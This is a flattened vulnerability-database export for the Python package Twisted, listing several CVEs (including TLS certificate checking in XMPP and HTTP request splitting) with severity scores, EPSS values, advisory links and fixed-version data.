scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-24801
20
reference_url https://github.com/advisories/GHSA-c2jg-hw38-jrqq
reference_id GHSA-c2jg-hw38-jrqq
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c2jg-hw38-jrqq
21
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6/
reference_id GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:49Z/
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLKHA6WREIVAMBQD7KKWYHPHGGNKMAG6/
22
reference_url https://access.redhat.com/errata/RHSA-2022:1645
reference_id RHSA-2022:1645
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:1645
23
reference_url https://access.redhat.com/errata/RHSA-2022:1646
reference_id RHSA-2022:1646
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:1646
24
reference_url https://access.redhat.com/errata/RHSA-2022:4930
reference_id RHSA-2022:4930
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:4930
25
reference_url https://usn.ubuntu.com/5576-1/
reference_id USN-5576-1
reference_type
scores
url https://usn.ubuntu.com/5576-1/
fixed_packages
0
url pkg:pypi/twisted@22.4.0
purl pkg:pypi/twisted@22.4.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-tec3-uqmg-tueq
2
vulnerability VCID-vz8r-fhqf-zudf
3
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@22.4.0
aliases CVE-2022-24801, GHSA-c2jg-hw38-jrqq, PYSEC-2022-195
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rzad-s8tu-47gm
8
url VCID-szfx-665h-w3eb
vulnerability_id VCID-szfx-665h-w3eb
summary In words.protocols.jabber.xmlstream in Twisted through 19.2.1, XMPP support did not verify certificates when used with TLS, allowing an attacker to MITM connections.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00013.html
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00013.html
1
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00028.html
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00028.html
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12855.json
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12855.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-12855
reference_id
reference_type
scores
0
value 0.00646
scoring_system epss
scoring_elements 0.70712
published_at 2026-04-13T12:55:00Z
1
value 0.00646
scoring_system epss
scoring_elements 0.70721
published_at 2026-04-09T12:55:00Z
2
value 0.00646
scoring_system epss
scoring_elements 0.70744
published_at 2026-04-11T12:55:00Z
3
value 0.00646
scoring_system epss
scoring_elements 0.70648
published_at 2026-04-01T12:55:00Z
4
value 0.00646
scoring_system epss
scoring_elements 0.70663
published_at 2026-04-02T12:55:00Z
5
value 0.00646
scoring_system epss
scoring_elements 0.70682
published_at 2026-04-04T12:55:00Z
6
value 0.00646
scoring_system epss
scoring_elements 0.7066
published_at 2026-04-07T12:55:00Z
7
value 0.00646
scoring_system epss
scoring_elements 0.70727
published_at 2026-04-12T12:55:00Z
8
value 0.00646
scoring_system epss
scoring_elements 0.70705
published_at 2026-04-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-12855
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12855
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12855
5
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
6
reference_url https://github.com/advisories/GHSA-65rm-h285-5cc5
reference_id
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-65rm-h285-5cc5
7
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2019-129.yaml
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2019-129.yaml
8
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
9
reference_url https://github.com/twisted/twisted/pull/1147
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/pull/1147
10
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PLTZDMFBNFSJMBXYJNGJHENJA4H2TSMZ
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PLTZDMFBNFSJMBXYJNGJHENJA4H2TSMZ
11
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PLTZDMFBNFSJMBXYJNGJHENJA4H2TSMZ
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PLTZDMFBNFSJMBXYJNGJHENJA4H2TSMZ
12
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PLTZDMFBNFSJMBXYJNGJHENJA4H2TSMZ/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PLTZDMFBNFSJMBXYJNGJHENJA4H2TSMZ/
13
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-12855
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-12855
14
reference_url https://twistedmatrix.com/trac/ticket/9561
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://twistedmatrix.com/trac/ticket/9561
15
reference_url https://usn.ubuntu.com/4308-1
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4308-1
16
reference_url https://usn.ubuntu.com/4308-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-1/
17
reference_url https://usn.ubuntu.com/4308-2
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4308-2
18
reference_url https://usn.ubuntu.com/4308-2/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-2/
19
reference_url https://www.oracle.com/security-alerts/cpuapr2020.html
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value 9.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2020.html
20
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1728206
reference_id 1728206
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1728206
21
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930626
reference_id 930626
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930626
fixed_packages
0
url pkg:pypi/twisted@19.7.0rc1
purl pkg:pypi/twisted@19.7.0rc1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-7d7z-nhf1-kyhc
2
vulnerability VCID-qavz-rft9-7bfb
3
vulnerability VCID-qc7c-e5fb-77f1
4
vulnerability VCID-qtwh-as1r-6ka5
5
vulnerability VCID-rzad-s8tu-47gm
6
vulnerability VCID-tec3-uqmg-tueq
7
vulnerability VCID-vcw1-fzw7-43f5
8
vulnerability VCID-vz8r-fhqf-zudf
9
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@19.7.0rc1
aliases CVE-2019-12855, GHSA-65rm-h285-5cc5, PYSEC-2019-129
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-szfx-665h-w3eb
9
url VCID-tec3-uqmg-tueq
vulnerability_id VCID-tec3-uqmg-tueq
summary Multiple vulnerabilities have been discovered in Twisted, the worst of which could result in denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-39348.json
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-39348.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-39348
reference_id
reference_type
scores
0
value 0.01138
scoring_system epss
scoring_elements 0.784
published_at 2026-04-12T12:55:00Z
1
value 0.01138
scoring_system epss
scoring_elements 0.78393
published_at 2026-04-13T12:55:00Z
2
value 0.01138
scoring_system epss
scoring_elements 0.78392
published_at 2026-04-09T12:55:00Z
3
value 0.01138
scoring_system epss
scoring_elements 0.78386
published_at 2026-04-08T12:55:00Z
4
value 0.01138
scoring_system epss
scoring_elements 0.78359
published_at 2026-04-07T12:55:00Z
5
value 0.01138
scoring_system epss
scoring_elements 0.78418
published_at 2026-04-11T12:55:00Z
6
value 0.01178
scoring_system epss
scoring_elements 0.78684
published_at 2026-04-02T12:55:00Z
7
value 0.01178
scoring_system epss
scoring_elements 0.78715
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-39348
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39348
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39348
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
5
reference_url https://github.com/twisted/twisted/commit/f2f5e81c03f14e253e85fe457e646130780db40b
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:43:19Z/
url https://github.com/twisted/twisted/commit/f2f5e81c03f14e253e85fe457e646130780db40b
6
reference_url https://github.com/twisted/twisted/commit/f49041bb67792506d85aeda9cf6157e92f8048f4
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:43:19Z/
url https://github.com/twisted/twisted/commit/f49041bb67792506d85aeda9cf6157e92f8048f4
7
reference_url https://github.com/twisted/twisted/security/advisories/GHSA-vg46-2rrj-3647
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:43:19Z/
url https://github.com/twisted/twisted/security/advisories/GHSA-vg46-2rrj-3647
8
reference_url https://lists.debian.org/debian-lts-announce/2022/11/msg00038.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:43:19Z/
url https://lists.debian.org/debian-lts-announce/2022/11/msg00038.html
9
reference_url https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-39348
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-39348
11
reference_url https://security.gentoo.org/glsa/202301-02
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:43:19Z/
url https://security.gentoo.org/glsa/202301-02
12
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1023359
reference_id 1023359
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1023359
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2139431
reference_id 2139431
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2139431
14
reference_url https://github.com/advisories/GHSA-vg46-2rrj-3647
reference_id GHSA-vg46-2rrj-3647
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vg46-2rrj-3647
15
reference_url https://usn.ubuntu.com/6575-1/
reference_id USN-6575-1
reference_type
scores
url https://usn.ubuntu.com/6575-1/
fixed_packages
0
url pkg:pypi/twisted@22.10.0rc1
purl pkg:pypi/twisted@22.10.0rc1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-562c-1hjs-hqau
1
vulnerability VCID-vz8r-fhqf-zudf
2
vulnerability VCID-y7f5-9nmg-w7b3
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/twisted@22.10.0rc1
aliases CVE-2022-39348, GHSA-vg46-2rrj-3647
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tec3-uqmg-tueq
10
url VCID-vcw1-fzw7-43f5
vulnerability_id VCID-vcw1-fzw7-43f5
summary In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10108.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10108.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-10108
reference_id
reference_type
scores
0
value 0.03411
scoring_system epss
scoring_elements 0.87435
published_at 2026-04-13T12:55:00Z
1
value 0.03411
scoring_system epss
scoring_elements 0.87439
published_at 2026-04-12T12:55:00Z
2
value 0.03411
scoring_system epss
scoring_elements 0.87425
published_at 2026-04-08T12:55:00Z
3
value 0.03411
scoring_system epss
scoring_elements 0.87432
published_at 2026-04-09T12:55:00Z
4
value 0.03411
scoring_system epss
scoring_elements 0.87444
published_at 2026-04-11T12:55:00Z
5
value 0.03411
scoring_system epss
scoring_elements 0.87383
published_at 2026-04-01T12:55:00Z
6
value 0.03411
scoring_system epss
scoring_elements 0.87392
published_at 2026-04-02T12:55:00Z
7
value 0.03411
scoring_system epss
scoring_elements 0.87407
published_at 2026-04-04T12:55:00Z
8
value 0.03411
scoring_system epss
scoring_elements 0.87406
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-10108
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10108
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10108
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/advisories/GHSA-h96w-mmrf-2h6v
reference_id
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-h96w-mmrf-2h6v
5
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2020-259.yaml
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2020-259.yaml
6
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
7
reference_url https://github.com/twisted/twisted/blob/6ff2c40e42416c83203422ff70dfc49d2681c8e2/NEWS.rst#twisted-2030-2020-03-13
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/blob/6ff2c40e42416c83203422ff70dfc49d2681c8e2/NEWS.rst#twisted-2030-2020-03-13
8
reference_url https://github.com/twisted/twisted/commit/4a7d22e490bb8ff836892cc99a1f54b85ccb0281
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/commit/4a7d22e490bb8ff836892cc99a1f54b85ccb0281
9
reference_url https://know.bishopfox.com/advisories
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://know.bishopfox.com/advisories
10
reference_url https://know.bishopfox.com/advisories/twisted-version-19.10.0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://know.bishopfox.com/advisories/twisted-version-19.10.0
11
reference_url https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2022/02/msg00021.html
12
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL
13
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ISMZFZBWW4EV6ETJGXAYIXN3AT7GBPL/
14
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D
15
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3NIL7VXSGJND2Q4BSXM3CFTAFU6T7D/
reference_id
reference_type
scores
